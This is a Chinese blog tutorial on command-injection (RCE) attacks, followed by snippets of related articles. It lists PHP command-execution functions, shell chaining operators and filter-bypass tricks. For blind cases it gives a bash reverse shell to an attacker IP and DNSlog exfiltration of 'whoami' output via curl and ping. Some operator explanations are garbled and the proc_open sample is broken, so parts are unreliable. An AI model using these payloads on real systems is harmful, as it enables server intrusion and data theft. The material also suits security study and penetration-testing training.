RCE(命令执行)详解

最新推荐文章于 2024-02-21 13:47:34 发布
最新推荐文章于 2024-02-21 13:47:34 发布
阅读量465 收藏 12
点赞数 11
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82576671/article/details/135835830
版权

RCE(命令执行)

1.1、简介

1.1.1、原理

通过命令连接符将恶意命令拼接到正常函数中,从而执行系统命令。

1.1.2、命令执行函数

1、system
<?php system('whoami');?>
2、exec
<?php exec('whoami');?>
3、shell_exec
<?php echo shell_exec('whoami');?>
4、passthru
<?php passthru('whoami');?>
5、popen
<?php popen('touch test.txt',"r");?>
6、proc_open
<?php 
$proc=proc_open("whoami",
array("pipe","r"),
array("pipe","w"),
array("pipe","w")              
),$pipe;
print stream_get_contentss($pipes[1]);
?>
7、反引号
<?php echo `whoami`;?>

1.1.3、连接符

Windows
1&
&前面为假,则直接执行&后面的语句。
&前面为真,则&前后都执行。
2&&
&&前面的语句为假,则直接报错,&&后面的语句也不执行。
&&前面的语句为真,则&&前面的语句都执行。
3|
|前面的语句为假,则直接报错,|后面的语句也不执行。
||前面的语句为真,则执行|后面的语句。
4||
||前面的语句为假,则执行||后面的语句。
||前面的语句为真,则只执行||前面的语句,不执行||后面的语句。
Linux
1、;(Linux特有)
;使多个命令顺序执行,前面的命令和后面的命令都会执行。
┌──(root㉿popoy)-[/]
└─# id;id            
uid=0(root) gid=0(root) 组=0(root)
uid=0(root) gid=0(root) 组=0(root)
2、&
&的前面命令都执行。
3、&&
&的前面命令都执行。
4、|
|的前面的命令输出作为后面的命令输入,前面的命令和后面的命令都会执行,但是只显示后面的命令的执行结果。
5、||
||前面的命令执行成功,前面的命令执行成功,后面的命令就不会执行;若前面的命令执行失败,则会执行后面的命令。

1.2、绕过

1.2.1、空格绕过

1、${IFS}绕过

[root@wang /]# cat${IFS}nginx.conf

2、$IFS$9

[root@wang /]# cat$IFS$9nginx.conf

3、制表符(TAB)

%09是制表符的URL编码,可以用%09来代替空格,绕过空格过滤。

http://xxxx/?ip=127.0.0.1;cat%09nginx.conf

4、{}绕过

[root@wang /]# {cat,nginx.conf}

5、<绕过

[root@wang /]# cat<nginx.conf

1.2.2、关键词绕过

1、变量绕过

[root@wang /]# a=c;b=at;$a$b nginx.conf

2、空变量绕过

[root@wang /]# cat${x} nginx.conf

3、系统变量绕过

${SHELLOPTS}是系统变量,可以利用系统变量的字符串拼接绕过过滤。

[root@wang /]# echo ${SHELLOPTS}
braceexpand:emacs:hashall:histexpand:history:interactive-comments:monitor
[root@wang /]# echo ${SHELLOPTS:3:1}
c
[root@wang /]# ${SHELLOPTS:3:1}at nginx.conf

4、\绕过

[root@wang /]# c\a\t nginx.conf

5、通配符绕过

*代表0到多个任意字符。
?表示一个字符。
[]内为字符范围,代表该字符范围中的任一一个字符。
[root@wang /]# cat ?gin?.conf

7、base64

[root@wang /]# `echo "aWQ="|base64 -d`
uid=0(root) gid=0(root)=0(root)
#base64 -d对命令进行解码。

8、expr和awk绕过

#通过expr和awk命令从其他文件中获取字符并进行命令构造。
#expr:字符串截取。
[root@wang /]# expr substr "this is a test" 3 5
is is

1.2.3、无回显绕过

1、反弹shell绕过

攻击主机:
┌──(root㉿popoy)-[~]
└─# nc -lvp 9999
目标主机:
[root@wang /]# bash -i >& /dev/tcp/192.168.41.133/9999 0>&1
#IP地址转换为十进制或16进制,然后可以使用通配符替换关键字。
[root@wang /]# bash -i >& /dev/tcp/3232246149/9999 0>&1

2、DNSlog

curl 2iz2m2.dnslog.cn/`whoami`
ping `whoami`.2iz2m2.dnslog.cn
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 577
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-10)RCE (远程代码/命令执行漏洞)相关面试题
qq_51577576的博客
12-24 2106
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-10)RCE (远程代码/命令执行漏洞)相关面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞RCE (远程代码/命令执行漏洞)方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
(RCE)命令执行和代码执行的原理、危害、防范、绕过
m0_52556798的博客
03-19 2856
RCE包括系统命令执行和代码执行,照这样下去owasp top10 快总结完了! rce原理讲讲? 远程系统命令执行 是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交能执行命令,从而让后台进行执行,从而控制整个后台服务器。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试
web安全之命令执行(六)
Delity的博客
07-08 3871
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
$IFS
vsooda的专栏
06-23 1055
转自:http://bash.cyberciti.biz/guide/$IFS The IFS is a special shell variable.You can change the value of IFS as per your requirments.The Internal Field Separator (IFS) that is used for word splittin
RCE——命令执行
m0_73756016的博客
02-21 985
和星号(*)用来模糊搜索文件?将前面的命令的输出作为后面命令的输入,把前面命令的结果当成后面命令的参数,前面的命令和后面的命令都会执行,但只显示后面的命令执行结果。shell_exec(): 执行shell命令并返回输出的结果的字符串,回显需要echo。若前面的命令执行成功,则后面的命令就不会执行,若前面的命令执行失败,则执行后面的命令。"<"表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。exec(): 执行一个外部的应用程序,以数组形式保存结果,回显需要echo。
RCE(远程代码执行漏洞)原理
彼岸花苏陌的博客
12-08 1399
RCE(远程代码执行漏洞)原理 一般在交换机或者路由器等等会设置一个ping的界面以便测试,如果防范不到会造成远程代码执行 一般使用ping会用到下面代码 $cmd = shell_exec( 'ping ' . $target ); 但是这个代码没有做任何处理,这样就会导致非预期输入例如: 输入:127.0.0.1|ipconfig 解释:|代表管道符,|的意思是只执行后面的程序 诸如此类的还有 || 前面为假则执行后面语句,否则只执行前面语句 & 无论前后是真是假都执行
RCE远程命令执行漏洞详解
一个努力学习网安的小牛马
10-26 394
RCE漏洞的描述危害以及解决方法
干货 | 命令执行漏洞和代码执行漏洞详解
weixin_39670937的博客
06-20 925
命令执行RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
命令执行漏洞详解及DVWA靶场练习
c_programj的博客
06-25 3323
命令执行漏洞1.产生原因2.漏洞危害3.远程命令执行4.系统命令执行命令执行常用特殊字符5.常见 命令常见系统命令与功能windowslinux6.防范措施7.dvwa靶场练习windows【Low】【Medium】【High】【Impossible】linux【low】【Medium】【High】 1.产生原因 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令执行。攻击者可以任意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。 RCE:远程命令和代码执行。 2.漏洞危害 ①继承web
PHPStudy RCE漏洞详解:远程代码执行风险与防范
对于PHPStudy RCE漏洞的影响,其严重性在于攻击者可以完全控制受影响的服务器,执行任意命令,包括但不限于删除数据、泄露敏感信息、安装后门,甚至将服务器用作僵尸网络的一部分。此外,通过XSS(跨站脚本)攻击...
RCE(远程命令/代码执行漏洞)原理及复现
qq_41679358的博客
08-15 9445
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格.
shell中的特殊变量IFS的使用,以及其值为$'\n'与'\n'时的区别。
业精于勤,荒于嬉;行成于思,毁于随
01-30 9141
shell中使用到for循环时,是通过IFS同样也是来定义分隔符。如果要指定多个IFS字符,只要将他们在赋值行串起来就行。如下: IFS=$'\n':;" 这个赋值会将换行符、冒号、分号和双引号作为字段分隔符。如何使用 IFS 字符解析数据没有任何限制。 那么下面三个的区别是什么呢? IFS='\n' //将字符\和字符n作为IFS的换行符。 IFS='\n' //与
$IFS用法
weixin_33681778的博客
11-22 2116
[root@station shell]# cat 7.sh #!/bin/bash var="'(]\\{}\$\"" echo $var echo "$var" echo IFS='\' echo $var echo "$var" exit 0 [root@station shell]# ./7.sh '(]\{}$" '(]\{}$" ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8549
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Tobit与Probit模型Stata实现代码-最新发布.zip
最新发布
11-14
Tobit与Probit模型Stata实现代码-最新发布.zip
供AI训练的中文数据集持续更新与AI公司图谱目前的数据集餐饮行业8000问百度知道Alpaca中文数据集计算机领域数据.zip
11-14
Jupyter-Notebook
红警单机版(单机游戏)
11-14
红警单机版(单机游戏)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值